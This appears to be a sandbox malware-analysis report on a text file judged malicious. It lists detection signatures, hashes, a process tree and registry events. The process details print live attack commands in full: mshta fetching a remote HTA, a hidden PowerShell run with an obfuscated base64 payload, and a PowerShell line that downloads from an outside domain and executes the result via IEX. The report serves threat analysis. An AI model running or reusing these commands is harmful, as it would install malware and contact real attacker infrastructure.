File name:

test.txt

Full analysis: https://app.any.run/tasks/7d5f4f2d-8fd0-466e-9130-7c6abe46452a
Verdict: Malicious activity
Analysis date: March 23, 2025, 07:56:10
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
possible-phishing
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with no line terminators
MD5:

A85154BA57AD6C325DFA215FFC169579

SHA1:

4E3299AD5CABD426058A052277F9701847B7DB91

SHA256:

8434E971086C589EC9484C604644903973CB372D7A7A8497940A5915D4A535B5

SSDEEP:

3:rN6e8IDAU+SPaUD1X1AGFFhGWsxcs9yeqalm1X0s6RvwdKsr9en:Z6e8ITb1X1AG/hGXcNeqa81XZdr9e

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy

      • mshta.exe (PID: 6816)
      • mshta.exe (PID: 6228)
    • Changes powershell execution policy (Unrestricted)

      • powershell.exe (PID: 736)
      • powershell.exe (PID: 5452)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7704)
      • powershell.exe (PID: 5988)
  • SUSPICIOUS

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 6816)
      • powershell.exe (PID: 736)
      • mshta.exe (PID: 6228)
      • powershell.exe (PID: 5452)
    • Base64-obfuscated command line is found

      • mshta.exe (PID: 6816)
      • mshta.exe (PID: 6228)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 6816)
      • powershell.exe (PID: 736)
      • mshta.exe (PID: 6228)
      • powershell.exe (PID: 5452)
    • Executes script without checking the security policy

      • powershell.exe (PID: 736)
      • powershell.exe (PID: 5452)
    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 6816)
      • mshta.exe (PID: 6228)
    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 736)
      • powershell.exe (PID: 5452)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 736)
      • powershell.exe (PID: 5452)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 736)
      • powershell.exe (PID: 5452)
    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 7704)
      • powershell.exe (PID: 5988)
    • Reads security settings of Internet Explorer

      • ShellExperienceHost.exe (PID: 7924)
    • The process executes via Task Scheduler

      • powershell.exe (PID: 6436)
  • INFO

    • Process checks computer location settings

      • SearchApp.exe (PID: 2924)
    • Reads the machine GUID from the registry

      • SearchApp.exe (PID: 2924)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 5156)
      • notepad.exe (PID: 1532)
      • BackgroundTransferHost.exe (PID: 7532)
      • BackgroundTransferHost.exe (PID: 7400)
      • BackgroundTransferHost.exe (PID: 7948)
      • BackgroundTransferHost.exe (PID: 7736)
    • Checks proxy server information

      • BackgroundTransferHost.exe (PID: 7400)
      • mshta.exe (PID: 6816)
      • powershell.exe (PID: 7704)
      • slui.exe (PID: 7196)
      • mshta.exe (PID: 6228)
      • powershell.exe (PID: 5988)
    • Checks supported languages

      • SearchApp.exe (PID: 2924)
      • ShellExperienceHost.exe (PID: 7924)
    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 7400)
    • Reads the software policy settings

      • SearchApp.exe (PID: 2924)
      • BackgroundTransferHost.exe (PID: 7400)
      • slui.exe (PID: 5972)
      • slui.exe (PID: 7196)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 6816)
      • mshta.exe (PID: 6228)
    • Manual execution by a user

      • mshta.exe (PID: 6816)
      • powershell.exe (PID: 7428)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 736)
      • powershell.exe (PID: 5452)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 736)
      • powershell.exe (PID: 5452)
    • Returns hidden items found within a container (POWERSHELL)

      • conhost.exe (PID: 7544)
      • conhost.exe (PID: 7436)
      • conhost.exe (PID: 616)
      • conhost.exe (PID: 4452)
      • conhost.exe (PID: 8136)
    • Reads the computer name

      • ShellExperienceHost.exe (PID: 7924)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7704)
      • powershell.exe (PID: 5988)
    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 6436)
    • Disables trace logs

      • powershell.exe (PID: 7704)
      • powershell.exe (PID: 5988)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
167
Monitored processes
25
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start notepad.exe no specs sppextcomobj.exe no specs slui.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs mshta.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs shellexperiencehost.exe no specs slui.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs mshta.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs searchapp.exe

Process information

PID
CMD
Path
Indicators
Parent process
616\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
736"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JAByAEQAagBvAG0AQgAgAD0AIAAnADYAOQA2ADUANwA4ADUAMwA3ADQANgAxADcAMgA3ADQAMgBEADUAMAA3ADIANgBGADYAMwA2ADUANwAzADcAMwAyADAAMgAyADIANAA2ADUANgBFADcANgAzAEEANQA3ADQAOQA0AEUANAA0ADQAOQA1ADIANQBDADUAMwA3ADkANwAzADUANwA0AEYANQA3ADMANgAzADQANQBDADUANwA2ADkANgBFADYANAA2AEYANwA3ADcAMwA1ADAANgBGADcANwA2ADUANwAyADUAMwA2ADgANgA1ADYAQwA2AEMANQBDADcANgAzADEAMgBFADMAMAA1AEMANwAwADYARgA3ADcANgA1ADcAMgA3ADMANgA4ADYANQA2AEMANgBDADIARQA2ADUANwA4ADYANQAyADIAMgAwADIARAA1ADcANgA5ADYARQA2ADQANgBGADcANwA1ADMANwA0ADcAOQA2AEMANgA1ADIAMAA0ADgANgA5ADYANAA2ADQANgA1ADYARQAyADAAMgBEADQAMQA3ADIANgA3ADcANQA2AEQANgA1ADYARQA3ADQANABDADYAOQA3ADMANwA0ADIAMAAyADcAMgBEADQARQA2AEYANQAwADcAMgA2AEYANgA2ADYAOQA2AEMANgA1ADIANwAyAEMAMgA3ADIARAA0ADUANwA4ADYANQA2ADMANwA1ADcANAA2ADkANgBGADYARQA1ADAANgBGADYAQwA2ADkANgAzADcAOQAyADcAMgBDADIANwA1ADUANgBFADcAMgA2ADUANwAzADcANAA3ADIANgA5ADYAMwA3ADQANgA1ADYANAAyADcAMgBDADIANwAyAEQANAAzADYARgA2AEQANgBEADYAMQA2AEUANgA0ADIANwAyAEMAMgA3ADUAMwA1ADYAMgAwADcANQA3ADQAMgAwADIAOAA1AEIANABFADYANQA3ADQAMgBFADUANwA2ADUANgAyADQAMwA2AEMANgA5ADYANQA2AEUANwA0ADUARAAzAEEAMwBBADQARQA2ADUANwA3ADIAOAAyADkAMgA5ADMAQgA1ADMANAA5ADIAMAA1ADYANgAxADcAMgA2ADkANgAxADYAMgA2AEMANgA1ADMAQQAzADMANQAzADIAMAAyADgAMgA4ADIAOAAyADgANQBCADQARQA2ADUANwA0ADIARQA1ADcANgA1ADYAMgA0ADMANgBDADYAOQA2ADUANgBFADcANAA1AEQAMwBBADMAQQA0AEUANgA1ADcANwAyADgAMgA5ADcAQwA0ADcANgA1ADcANAAyAEQANABEADYANQA2AEQANgAyADYANQA3ADIAMgA5ADcAQwAzAEYANwBCADIAOAA0ADcANgA1ADcANAAyAEQANAAzADYAOAA2ADkANgBDADYANAA0ADkANwA0ADYANQA2AEQAMgAwADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMwBBADIARgA1AEYAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIARQA0AEUANgAxADYARAA2ADUAMgAwADIARAA2ADMANgBDADYAOQA2AEIANgA1ADIAMAAyADcAMgA3ADIAQQA3ADcANgBFADIAQQA2ADcAMgA3ADIANwA3AEQAMgA5ADIARQA0AEUANgAxADYARAA2ADUAMgA5ADIAOQAzAEIANQAzADYANQA3ADQAMgBEADQAOQA3ADQANgA1ADYARAAyADAANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAzAEEANQBDADcAMAAyADAAMgA3ADIANwA2ADgANwA0ADcANAA3ADAANwAzADMAQQAyAEYAMgBGADYAOAAzADIAMgBFADcAOQA3ADkANgBGADYAOQA3ADkAMgBFADcAMwA2ADgANgBGADcAMAAyAEYAMwA3ADYANgA2ADIANgA1ADMANQA2ADYANgAyADMAMwA2ADIANgAxADMAOQAzADUAMwA4ADYAMQAzADcAMwA3ADYANgAzADEAMwA3ADYANAAzADEANgA0ADMANAAzADAAMwAwADMANQAzADUAMwA1ADMAOAAzADAAMwA5ADYANQAzADcAMwAxADYANAAzADgAMwA2ADYANgA2ADUAMwA4ADMAOQAzADkAMwA5ADMAOAAzADMAMwAwADYAMwAzADEAMgBFADcANwA3ADAANgA0ADIANwAyADcAMwBCADQAOQA0ADUANQA4ADIAMAAyADgANAA3ADYANQA3ADQAMgBEADQAOQA3ADQANgA1ADYARAAyADAANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAzAEEAMgBGADcANQA3ADQAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIARQAyADgAMgA4ADQANwA2ADUANwA0ADIARAA0ADkANwA0ADYANQA2AEQAMgAwADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMwBBADMAMwA1ADMAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIAOQAyADgAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADcAMAAyADAAMgBEADUANgA2ADEANgBDADcANQA2ADUANABGADYARQAyADkAMgA5ADIANwAzAEIAMgA0ADQAMwA2AEYANABEADcANQA0AEMANgA0ADUANQA3ADMANwAwADIAMAAzAEQAMgAwADIANAA2ADUANgBFADcANgAzAEEANAAxADcAMAA3ADAANAA0ADYAMQA3ADQANgAxADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA1ADYANwAzADYAOAA2ADEANgBDADQANwA1ADYAMgA4ADIANAA0AEYANgBCADYAMgA2ADIANgA4ADIAQwAyADAAMgA0ADUANAA3ADcANABBADQAQwA1ADcANwAyADUANAAyADkANwBCADYAMwA3ADUANwAyADYAQwAyADAAMgA0ADQARgA2AEIANgAyADYAMgA2ADgAMgAwADIARAA2AEYAMgAwADIANAA1ADQANwA3ADQAQQA0AEMANQA3ADcAMgA1ADQANwBEADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA1ADgANwBBADUAMgA3ADgANAAzADYAQwA0AEYAMgA4ADIAOQA3AEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANAA4ADcAMAA1ADMANwAxADIAOAAyADQANwAzADYAQgA0ADUANwAwADcANgA1AEEANwA2ADQAMQA2AEEAMgA5ADcAQgA2ADkANgA2ADIAOAAyADEAMgA4ADUANAA2ADUANwAzADcANAAyAEQANQAwADYAMQA3ADQANgA4ADIAMAAyAEQANQAwADYAMQA3ADQANgA4ADIAMAAyADQANQA0ADcANwA0AEEANABDADUANwA3ADIANQA0ADIAOQAyADkANwBCADUANgA3ADMANgA4ADYAMQA2AEMANAA3ADUANgAyADAAMgA0ADcAMwA2AEIANAA1ADcAMAA3ADYANQBBADcANgA0ADEANgBBADIAMAAyADQANQA0ADcANwA0AEEANABDADUANwA3ADIANQA0ADcARAA3AEQANwBEADUAOAA3AEEANQAyADcAOAA0ADMANgBDADQARgAzAEIAJwAgAC0AcwBwAGwAaQB0ACAAJwAoAC4AewAyAH0AKQAnACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8AfQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AFsAYwBoAGEAcgBdACgAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBJAG4AdAAzADIAKAAkAF8ALAAxADYAKQApAH0AOwAkAHIARABqAG8AbQBCACAAPQAgACQAcgBEAGoAbwBtAEIAIAAtAGoAbwBpAG4AIAAnACcAOwAgACYAIAAkAHIARABqAG8AbQBCAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMwApACAAJAByAEQAagBvAG0AQgAuAFMAdQBiAHMAdAByAGkAbgBnACgAMwApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1532"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\test.txtC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
2924"C:\WINDOWS\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mcaC:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Search application
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\systemapps\microsoft.windows.search_cw5n1h2txyewy\searchapp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\wincorlib.dll
4452\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5156"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
5452"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JAByAEQAagBvAG0AQgAgAD0AIAAnADYAOQA2ADUANwA4ADUAMwA3ADQANgAxADcAMgA3ADQAMgBEADUAMAA3ADIANgBGADYAMwA2ADUANwAzADcAMwAyADAAMgAyADIANAA2ADUANgBFADcANgAzAEEANQA3ADQAOQA0AEUANAA0ADQAOQA1ADIANQBDADUAMwA3ADkANwAzADUANwA0AEYANQA3ADMANgAzADQANQBDADUANwA2ADkANgBFADYANAA2AEYANwA3ADcAMwA1ADAANgBGADcANwA2ADUANwAyADUAMwA2ADgANgA1ADYAQwA2AEMANQBDADcANgAzADEAMgBFADMAMAA1AEMANwAwADYARgA3ADcANgA1ADcAMgA3ADMANgA4ADYANQA2AEMANgBDADIARQA2ADUANwA4ADYANQAyADIAMgAwADIARAA1ADcANgA5ADYARQA2ADQANgBGADcANwA1ADMANwA0ADcAOQA2AEMANgA1ADIAMAA0ADgANgA5ADYANAA2ADQANgA1ADYARQAyADAAMgBEADQAMQA3ADIANgA3ADcANQA2AEQANgA1ADYARQA3ADQANABDADYAOQA3ADMANwA0ADIAMAAyADcAMgBEADQARQA2AEYANQAwADcAMgA2AEYANgA2ADYAOQA2AEMANgA1ADIANwAyAEMAMgA3ADIARAA0ADUANwA4ADYANQA2ADMANwA1ADcANAA2ADkANgBGADYARQA1ADAANgBGADYAQwA2ADkANgAzADcAOQAyADcAMgBDADIANwA1ADUANgBFADcAMgA2ADUANwAzADcANAA3ADIANgA5ADYAMwA3ADQANgA1ADYANAAyADcAMgBDADIANwAyAEQANAAzADYARgA2AEQANgBEADYAMQA2AEUANgA0ADIANwAyAEMAMgA3ADUAMwA1ADYAMgAwADcANQA3ADQAMgAwADIAOAA1AEIANABFADYANQA3ADQAMgBFADUANwA2ADUANgAyADQAMwA2AEMANgA5ADYANQA2AEUANwA0ADUARAAzAEEAMwBBADQARQA2ADUANwA3ADIAOAAyADkAMgA5ADMAQgA1ADMANAA5ADIAMAA1ADYANgAxADcAMgA2ADkANgAxADYAMgA2AEMANgA1ADMAQQAzADMANQAzADIAMAAyADgAMgA4ADIAOAAyADgANQBCADQARQA2ADUANwA0ADIARQA1ADcANgA1ADYAMgA0ADMANgBDADYAOQA2ADUANgBFADcANAA1AEQAMwBBADMAQQA0AEUANgA1ADcANwAyADgAMgA5ADcAQwA0ADcANgA1ADcANAAyAEQANABEADYANQA2AEQANgAyADYANQA3ADIAMgA5ADcAQwAzAEYANwBCADIAOAA0ADcANgA1ADcANAAyAEQANAAzADYAOAA2ADkANgBDADYANAA0ADkANwA0ADYANQA2AEQAMgAwADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMwBBADIARgA1AEYAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIARQA0AEUANgAxADYARAA2ADUAMgAwADIARAA2ADMANgBDADYAOQA2AEIANgA1ADIAMAAyADcAMgA3ADIAQQA3ADcANgBFADIAQQA2ADcAMgA3ADIANwA3AEQAMgA5ADIARQA0AEUANgAxADYARAA2ADUAMgA5ADIAOQAzAEIANQAzADYANQA3ADQAMgBEADQAOQA3ADQANgA1ADYARAAyADAANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAzAEEANQBDADcAMAAyADAAMgA3ADIANwA2ADgANwA0ADcANAA3ADAANwAzADMAQQAyAEYAMgBGADYAOAAzADIAMgBFADcAOQA3ADkANgBGADYAOQA3ADkAMgBFADcAMwA2ADgANgBGADcAMAAyAEYAMwA3ADYANgA2ADIANgA1ADMANQA2ADYANgAyADMAMwA2ADIANgAxADMAOQAzADUAMwA4ADYAMQAzADcAMwA3ADYANgAzADEAMwA3ADYANAAzADEANgA0ADMANAAzADAAMwAwADMANQAzADUAMwA1ADMAOAAzADAAMwA5ADYANQAzADcAMwAxADYANAAzADgAMwA2ADYANgA2ADUAMwA4ADMAOQAzADkAMwA5ADMAOAAzADMAMwAwADYAMwAzADEAMgBFADcANwA3ADAANgA0ADIANwAyADcAMwBCADQAOQA0ADUANQA4ADIAMAAyADgANAA3ADYANQA3ADQAMgBEADQAOQA3ADQANgA1ADYARAAyADAANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAzAEEAMgBGADcANQA3ADQAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIARQAyADgAMgA4ADQANwA2ADUANwA0ADIARAA0ADkANwA0ADYANQA2AEQAMgAwADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMwBBADMAMwA1ADMAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIAOQAyADgAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADcAMAAyADAAMgBEADUANgA2ADEANgBDADcANQA2ADUANABGADYARQAyADkAMgA5ADIANwAzAEIAMgA0ADQAMwA2AEYANABEADcANQA0AEMANgA0ADUANQA3ADMANwAwADIAMAAzAEQAMgAwADIANAA2ADUANgBFADcANgAzAEEANAAxADcAMAA3ADAANAA0ADYAMQA3ADQANgAxADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA1ADYANwAzADYAOAA2ADEANgBDADQANwA1ADYAMgA4ADIANAA0AEYANgBCADYAMgA2ADIANgA4ADIAQwAyADAAMgA0ADUANAA3ADcANABBADQAQwA1ADcANwAyADUANAAyADkANwBCADYAMwA3ADUANwAyADYAQwAyADAAMgA0ADQARgA2AEIANgAyADYAMgA2ADgAMgAwADIARAA2AEYAMgAwADIANAA1ADQANwA3ADQAQQA0AEMANQA3ADcAMgA1ADQANwBEADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA1ADgANwBBADUAMgA3ADgANAAzADYAQwA0AEYAMgA4ADIAOQA3AEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANAA4ADcAMAA1ADMANwAxADIAOAAyADQANwAzADYAQgA0ADUANwAwADcANgA1AEEANwA2ADQAMQA2AEEAMgA5ADcAQgA2ADkANgA2ADIAOAAyADEAMgA4ADUANAA2ADUANwAzADcANAAyAEQANQAwADYAMQA3ADQANgA4ADIAMAAyAEQANQAwADYAMQA3ADQANgA4ADIAMAAyADQANQA0ADcANwA0AEEANABDADUANwA3ADIANQA0ADIAOQAyADkANwBCADUANgA3ADMANgA4ADYAMQA2AEMANAA3ADUANgAyADAAMgA0ADcAMwA2AEIANAA1ADcAMAA3ADYANQBBADcANgA0ADEANgBBADIAMAAyADQANQA0ADcANwA0AEEANABDADUANwA3ADIANQA0ADcARAA3AEQANwBEADUAOAA3AEEANQAyADcAOAA0ADMANgBDADQARgAzAEIAJwAgAC0AcwBwAGwAaQB0ACAAJwAoAC4AewAyAH0AKQAnACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8AfQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AFsAYwBoAGEAcgBdACgAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBJAG4AdAAzADIAKAAkAF8ALAAxADYAKQApAH0AOwAkAHIARABqAG8AbQBCACAAPQAgACQAcgBEAGoAbwBtAEIAIAAtAGoAbwBpAG4AIAAnACcAOwAgACYAIAAkAHIARABqAG8AbQBCAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMwApACAAJAByAEQAagBvAG0AQgAuAFMAdQBiAHMAdAByAGkAbgBnACgAMwApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5972"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5988"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command SV ut ([Net.WebClient]::New());SI Variable:3S (((([Net.WebClient]::New()|Get-Member)|?{(Get-ChildItem Variable:/_).Value.Name -clike '*wn*g'}).Name));Set-Item Variable:\p 'https://h2.yyoiy.shop/7fbe5fb3ba958a77f17d1d400555809e71d86fe8999830c1.wpd';IEX (Get-Item Variable:/ut).Value.((Get-Item Variable:3S).Value)((Variable p -ValueOn)) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6228"C:\WINDOWS\system32\mshta.exe" https://pub-039ab9055e1e4b7cb43b6328cf82b81e.r2.dev/ii.mp3C:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
Total events
46 420
Read events
46 237
Write events
180
Delete events
3

Modification events

(PID) Process:(2924) SearchApp.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\A1hdl50UVDh2ZbG324Nx-6fZgntcGnHOs5kHLdmaJYE\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech_OneCore\Recognizers
Operation:writeName:DefaultTokenId
Value:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech_OneCore\Recognizers\Tokens\MS-1033-110-WINMO-DNN
(PID) Process:(2924) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\Flighting
Operation:delete valueName:CachedFeatureString
Value:
(PID) Process:(2924) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings
Operation:writeName:IsMSACloudSearchEnabled
Value:
0
(PID) Process:(2924) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings
Operation:writeName:IsAADCloudSearchEnabled
Value:
0
(PID) Process:(2924) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
Operation:writeName:CortanaStateLastRun
Value:
AABEDF6700000000
